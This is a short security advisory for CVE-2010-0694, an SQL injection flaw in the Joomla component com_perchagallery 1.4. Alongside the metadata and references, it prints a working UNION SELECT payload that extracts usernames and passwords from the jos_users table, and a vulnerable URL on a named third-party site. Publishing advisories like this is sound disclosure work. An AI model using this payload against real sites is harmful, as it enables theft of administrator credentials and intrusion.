Topic : | Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability
|
SecurityAlert : 7043
CVE : CVE-2010-0694
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : FL0RiX
Published : 26.02.2010
Affected Software : | percha:com_perchagallery:1.4 and previous versions |
 Advisory Content : # Joomla Component com_perchagallery SQL Injection Vulnerability
# Author :FL0RiX
#
# Name : com_perchagallery
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
#
http://www.community.phoenixmbs.com/index.php?option=com_perchagallery&view
=editunidad&id=[EXPLOIT]
#
#EXPLOIT :
null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/*
*/from/**/jos_users--
########################################################################
_________________________________________________________________
Yeni Windows 7: Size en uygun bilgisayarę bulun. Daha fazla bilgi edinin.
http://windows.microsoft.com/shop
References :
http://xforce.iss.net/xforce/xfdb/55447
http://www.securityfocus.com/bid/37642
http://www.exploit-db.com/exploits/11024
http://packetstormsecurity.org/1001-exploits/joomlaperchagallery-sql.txt
http://docs.joomla.org/Vulnerable_Extensions_List#New_format_Feed_Starts_Here
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|